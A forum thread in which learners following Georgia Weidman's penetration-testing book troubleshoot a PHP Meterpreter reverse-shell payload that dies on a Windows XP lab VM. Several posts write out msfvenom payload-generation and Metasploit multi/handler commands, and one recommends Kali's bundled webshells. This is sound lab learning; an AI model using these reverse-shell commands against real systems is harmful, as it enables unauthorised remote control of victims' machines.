Georgia Weidman Chapter 8 – php/meterpreter/reverse_tcp with Kali 2016


This topic contains 8 replies, has 7 voices, and was last updated by  halfluke 1 year, 10 months ago.

  • #54591

    crowbotham
    Participant

    I was wondering how many of you have tried to run the exploit php/meterpreter/reverse_tcp lately with the new Kali 2016 rolling.

    First off, to problem solve I did make sure the machine was completely dist-upgrade/update/upgrade and restarted the machine.

    In the chapter of Weidman’s book we are trying to take advantage of the Windows XP vm which is vulnerable to this exploit.

    The directions we follow are:

    To create payload:

    msfvenom -p php/meterpreter/reverse_tcp LHOST=192…. LPORT=2323 -f raw > meterpreter.php

    This creates a payload that we want the victim to execute.

    msfconsole
    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set LHOST 192…
    set LPORT 2323
    exploit

    On our Windows XP VM we open the meterpreter.php file.

    Back in our Kali terminal we see that it recognized the vm opening the php file and get:
    [*] Meterpreter session 1 opened

    but then Metasploit gives the error:
    Meterpreter session 1 closed. Reason: Died

    So I am hoping that someone can try this on the new Kali and see if they are getting the same result. I appreciate any advice or suggestions that you have.

    Thank you,
    crowbotham

    #55038

    ycisec
    Participant

    I don’t know if this will be much help or not, but I’ve seen this behavior in other courses I’ve taken (I’ve got Georgia’s book but haven’t gone through it all yet) and I’ve found the php/meterpreter/reverse_tcp payload to be unstable at times. I’ve also seen it die when the process on the victim machine I’ve exploited dies, so if I don’t migrate processes quickly I lose the shell.

    #55095

    crowbotham
    Participant

    Yeah I think what might be happening too is that the VM isn’t stable enough to keep the connection open. Could be that I do not have enough RAM or processing power but when I run the exploit against my Ubuntu box (non vm) it works so it must be some issue with the VM.

    Thanks for your reply though. I have tried to migrate processes quickly, but it still doesn’t give me enough time to even hit enter for the migrate command to go through.

    Like I said though, I had an older desktop that I just threw Ubuntu on and then ran the exploit, and it worked.

    • This reply was modified 3 years, 6 months ago by  crowbotham.
    #63691

    iehov61
    Participant

    Hi, actually I’m running into the same issue. As soon as I get a PHP meterpreter session, the session dies and exits. The issue is that I’m getting a partial meterpreter session; some commands like sysinfo are not available. If I retry like 10 times, then I get a session that is stable for 10 extra seconds, and some additional commands. What could be the issue? Also, when trying to run post-exploitation modules with a PHP meterpreter session I get tons of errors … Is this like an identified bug or something?

    Any lights will be appreciated

    #70671

    breuermar
    Participant

    When I have to deal with meterpreter and PHP generated with msfvenom I have the same issue. Maybe try to migrate into another process, when this is possible, in the meterpreter session before it dies.
    When you are satisfied with a normal reverse shell you could use the “weevely” tool in Kali to generate your own password-protected shell.
    Kali comes with several webshells in “/usr/share/webshells/”. The reverse shell from “Pentestmonkey” is fantastic.

    #98945

    dfc302
    Participant

    So it’s August of 2017. I know this post was posted a while back, but I am currently going through this chapter and having the exact same issues. However, you said your issue might be not enough RAM, but I gave double the RAM to the XP VM and I am still experiencing the issue. Has anyone resolved this yet? Or did you personally ever find a solution? Thanks

    #99056

    crowbotham
    Participant

    You know, I never solved it. I just moved on past it. Now, knowing more about Metasploit, I would probably try to run the exploit with the -j tag, which will background the session first. Don’t know if it will work but it’s worth a try. To be honest, I skipped past it because I knew the theory behind it and could tell what it was supposed to do.

    Georgia’s book is all about learning the concepts and tools and with how quick those change it was good enough to understand what was trying to be accomplished.

    Good luck and I’m sorry I couldn’t be more help.

    #105890

    savvygeek
    Participant

    Exploit -j doesn’t have any effect on this. I’m using Kali 2017 v. 2 and I can’t get a stable Meterpreter session.

    I noticed she changes the command in the video and ends the command with a redirection (> meterpreter.php) instead of using -f raw as described in the book. Someone suggested this on Stack Overflow but it doesn’t solve the problem.

    • This reply was modified 1 year, 12 months ago by  savvygeek.
    #107801

    halfluke
    Participant

    EDIT:

    I have the same issue, and I’m annoyed because I *think* that it worked for me the first time I tried a couple of weeks ago, after following the videos and using exploit -j and ExitOnSession “false” . But perhaps it’s a retrospective illusion due to wishful thinking 🙂
    I get a “Meterpreter session 1 is not valid and will be closed” after 10-15 seconds whether I use a 2-stages php/meterpreter/reverse_tcp, or a 1-stage version php/meterpreter_reverse_tcp.
    msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=2323 -f raw > meterpreter2stages.php + use multi/handler set payload php/meterpreter/reverse_tcp
    msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.x.x LPORT=2323 -f raw > meterpreter1stage.php + use multi/handler set payload php/meterpreter_reverse_tcp
    No change if using -f raw, -o, or redirection with >
    Glad I’m not alone…

    • This reply was modified 1 year, 10 months ago by  halfluke. Reason: double-checked and fixed details